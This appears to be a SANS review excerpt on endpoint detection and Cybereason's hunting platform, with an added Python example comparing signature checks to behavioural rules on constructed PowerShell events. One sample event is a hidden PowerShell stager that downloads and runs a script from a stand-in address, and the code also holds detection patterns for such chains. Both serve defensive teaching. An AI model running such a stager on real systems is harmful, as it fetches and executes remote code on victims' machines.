The threat landscape becomes more daunting by the day. Increasingly sophisticated attacks are being spotted in the wild, and security teams are scrambling to keep up with campaigns aimed at end users. More than ever, the attacks targeting endpoints and servers alike are stealthier, harder to detect with traditional tools and more likely to focus on persistence and longer-term damage than on a quick, noisy payoff.
In the 2018 SANS “Endpoint Protection and Response” survey, 42 percent of respondents indicated that at least one of their endpoints had been compromised in the previous 12 months, primarily through browser exploits and social engineering. Sixteen percent of those who experienced a compromise learned of it through a third-party notification rather than their own tooling, which suggests that many of the endpoint security tools and tactics in use today are inadequate and that better prevention and detection capabilities are needed now. Almost 60 percent of respondents also said they would like artificial intelligence (AI) and machine learning capabilities in their endpoint protection tools but do not currently have them.
The previous generation of signature-based detection tools is failing us. Many attacks do not drop malware on disk at all: attackers rely on memory-resident techniques, compromised credentials and built-in system tools such as PowerShell, so there is no malicious file for a hash or byte-pattern signature to match, and many traditional endpoint platforms never raise an alert. Many endpoint agents also consume significant system resources, which pushes administrators to tune them down or exclude busy hosts.
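To make the contrast concrete, the following is an added example (not code from the original review or from Cybereason) that runs a file-hash signature check and a behaviour-based rule over three constructed process-creation events. The event fields, the signature list and the hashes are all made up for illustration; the point is that a stock, signed powershell.exe never appears in a known-bad hash list, while its command line and parent process still reveal a fileless download-and-execute chain.

```python
"""Signature check versus behavioural rule on process-creation telemetry.

Added example. Events are constructed, not real telemetry; field names
loosely mimic Windows process-creation logs (image, parent_image,
command_line, sha256). The hash values are placeholders.
"""
import base64
import re

# Constructed "signature database" of known-bad file hashes. A signed,
# stock powershell.exe is never in such a list, so a hash lookup alone
# can never flag living-off-the-land activity.
KNOWN_BAD_SHA256 = {"0" * 64}  # placeholder entry, constructed


def encode_ps(script):
    """Build a PowerShell -EncodedCommand argument (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def encoded_payload(cmdline):
    """Return the decoded -EncodedCommand payload if the command line has one."""
    m = re.search(r"-(?:e|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except ValueError:  # malformed base64
        return None


def signature_verdict(event):
    """Classic approach: malicious only if the image hash is on the list."""
    return "malicious" if event["sha256"] in KNOWN_BAD_SHA256 else "clean"


# Behavioural indicators drawn from the command line, after decoding.
SUSPICIOUS = [
    (r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", "remote download"),
    (r"\biex\b|invoke-expression", "dynamic execution"),
    (r"-nop\b|-noprofile", "profile bypass"),
    (r"-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"frombase64string", "in-memory decode"),
    (r"reflection\.assembly|virtualalloc", "in-memory code load"),
]
OFFICE_PARENTS = ("winword.exe", "excel.exe", "outlook.exe")


def behaviour_verdict(event):
    """Score what the process does and who launched it, not what its hash is."""
    cmd = event["command_line"]
    decoded = encoded_payload(cmd)
    text = cmd + (" " + decoded if decoded else "")
    reasons = [label for pat, label in SUSPICIOUS if re.search(pat, text, re.I)]
    if decoded:
        reasons.append("encoded command")
    if (event["parent_image"].lower().endswith(OFFICE_PARENTS)
            and event["image"].lower().endswith("powershell.exe")):
        reasons.append("office spawned powershell")
    score = len(reasons)
    verdict = "malicious" if score >= 3 else "suspicious" if score >= 1 else "clean"
    return verdict, reasons


# Constructed events: a benign admin query, a fileless download-and-run
# chain launched from a Word macro, and a benign scheduled task that
# happens to use an encoded command (a common source of false positives).
EVENTS = [
    {"name": "admin query", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe", "sha256": "1" * 64,
     "command_line": 'powershell.exe -Command "Get-Service | Where-Object Status -eq Running"'},
    {"name": "macro stager", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "sha256": "1" * 64,
     "command_line": "powershell.exe -nop -w hidden -EncodedCommand "
     + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')")},
    {"name": "scheduled task", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe", "sha256": "1" * 64,
     "command_line": "powershell.exe -EncodedCommand "
     + encode_ps(r"Get-Date | Out-File C:\logs\heartbeat.txt")},
]


def triage(events=EVENTS):
    """Return (name, signature verdict, behaviour verdict, reasons) per event."""
    return [(e["name"], signature_verdict(e), *behaviour_verdict(e)) for e in events]


if __name__ == "__main__":
    for name, sig, beh, why in triage():
        print(f"{name:15} signature={sig:9} behaviour={beh:10} {', '.join(why)}")
```

The signature check returns "clean" for all three events because the only binary involved is the operating system's own PowerShell. The behavioural rule marks the macro-launched stager as malicious on six independent indicators, leaves the admin query clean, and rates the scheduled task only "suspicious" on the single encoded-command indicator, which is the kind of event an analyst should triage rather than auto-block.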
SANS had the opportunity to review Cybereason’s AI hunting platform, which offers a lightweight, behavior-focused model of host-based protection intended to help intrusion analysis and investigation teams prevent, detect and analyze malicious behavior in their environments more rapidly and efficiently. The company recognizes that most enterprises lack analytics experts and do not have enough time to train tier 1 analysts on the job, so one of the platform’s primary goals is to help close today’s security skills gap. By emphasizing ease of use, built-in intelligence and search tools, rapid event triage, and highly capable hunting methods, Cybereason has built an intelligence-driven system that many security operations center (SOC) teams could leverage immediately to prevent attacks or analyze them more quickly. Our review environment was set up with real exploits and malware in a testbed operated by Cybereason, so the results reflect a vendor-controlled environment rather than an independent lab; within that environment we fully analyzed numerous examples of the product in action.